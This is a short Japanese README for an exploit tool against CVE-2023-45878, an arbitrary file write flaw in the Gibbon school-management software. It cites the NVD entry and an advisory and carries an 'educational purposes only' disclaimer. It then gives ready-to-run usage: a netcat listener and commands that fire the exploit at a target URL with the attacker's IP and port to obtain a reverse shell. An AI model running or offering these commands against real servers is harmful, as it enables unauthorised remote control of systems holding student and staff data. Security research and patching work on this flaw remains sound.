
CVE-2023-45878 簡単なエクスプロイト | リバースシェル
GibbonEdu Gibbon バージョン 25.0.1 以前では、任意のファイル書き込みが可能です。
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
このエクスプロイトは教育および研究目的でのみ提供されています。明示的な許可なく、このコードをシステムに対して不正に使用することは違法であり、さまざまな法域のサイバー犯罪法に違反する可能性があります。このエクスプロイトによって引き起こされる誤用や損害について、私は一切の責任を負いません。
このコードを実行する前に、適用されるすべての法律および倫理ガイドラインを遵守することは、ユーザーの責任です。悪意のある活動にこのエクスプロイトを使用しないでください。
このエクスプロイトは Windows Server でのみ動作します。脆弱なバージョンの Gibbon が Linux サーバーで実行されている場合は、それに応じてエクスプロイトを修正する必要があります。
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> または ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>